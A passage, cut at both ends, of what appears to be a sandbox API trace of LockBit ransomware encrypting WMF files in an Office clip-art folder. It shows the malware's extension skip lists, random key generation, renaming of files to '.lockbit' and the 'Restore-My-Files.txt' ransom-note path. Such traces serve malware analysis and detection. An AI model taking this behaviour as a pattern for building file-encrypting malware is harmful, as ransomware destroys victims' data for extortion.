lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.691] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.691] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.lockbit") returned 72 [0144.691] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.696] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.697] malloc (_Size=0x40068) returned 0x1ff1e60 [0144.697] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3368) returned 1 [0144.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0144.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.699] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0144.699] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0144.701] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.701] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.701] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.702] free (_Block=0x1fa2ed8) [0144.702] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.702] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.703] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2ab4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152590.WMF", cAlternateFileName="")) returned 1 [0144.703] lstrcmpiW (lpString1=".", lpString2="J0152590.WMF") returned -1 [0144.703] lstrcmpiW (lpString1="..", lpString2="J0152590.WMF") returned -1 [0144.703] PathFindExtensionW (pszPath="J0152590.WMF") returned=".WMF" [0144.703] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.703] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.704] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.704] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152590.WMF") returned 1 [0144.705] lstrcmpiW (lpString1="ntldr", lpString2="J0152590.WMF") returned 1 [0144.705] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152590.WMF") returned 1 [0144.705] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152590.WMF") returned -1 [0144.705] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152590.WMF") returned -1 [0144.705] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152590.WMF") returned 1 [0144.705] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152590.WMF") returned -1 [0144.705] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.705] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned=".WMF" [0144.705] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.705] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.705] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.706] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.707] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.707] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.707] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF.lockbit") returned 72 [0144.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0144.708] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.708] malloc (_Size=0x40068) returned 0x3d70450 [0144.708] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10932) returned 1 [0144.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0144.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0144.710] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0144.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.715] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.715] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.716] free (_Block=0x1fa2ed8) [0144.716] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.716] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.716] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.717] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x18c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152594.WMF", cAlternateFileName="")) returned 1 [0144.717] lstrcmpiW (lpString1=".", lpString2="J0152594.WMF") returned -1 [0144.717] lstrcmpiW (lpString1="..", lpString2="J0152594.WMF") returned -1 [0144.717] PathFindExtensionW (pszPath="J0152594.WMF") returned=".WMF" [0144.717] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.717] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.718] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.718] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.719] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152594.WMF") returned 1 [0144.719] lstrcmpiW (lpString1="ntldr", lpString2="J0152594.WMF") returned 1 [0144.719] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152594.WMF") returned 1 [0144.719] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152594.WMF") returned -1 [0144.719] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152594.WMF") returned -1 [0144.719] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152594.WMF") returned 1 [0144.719] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152594.WMF") returned -1 [0144.719] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.720] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned=".WMF" [0144.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.720] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.720] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.721] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.721] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.721] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.721] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.721] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.721] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF.lockbit") returned 72 [0144.721] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0144.722] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.722] malloc (_Size=0x40068) returned 0x3df0008 [0144.722] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6340) returned 1 [0144.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.723] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.729] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.729] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.730] free (_Block=0x1fa2ed8) [0144.730] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.730] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.730] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2628, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152600.WMF", cAlternateFileName="")) returned 1 [0144.730] lstrcmpiW (lpString1=".", lpString2="J0152600.WMF") returned -1 [0144.730] lstrcmpiW (lpString1="..", lpString2="J0152600.WMF") returned -1 [0144.730] PathFindExtensionW (pszPath="J0152600.WMF") returned=".WMF" [0144.730] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.730] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.730] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.730] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.730] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.730] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.730] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW 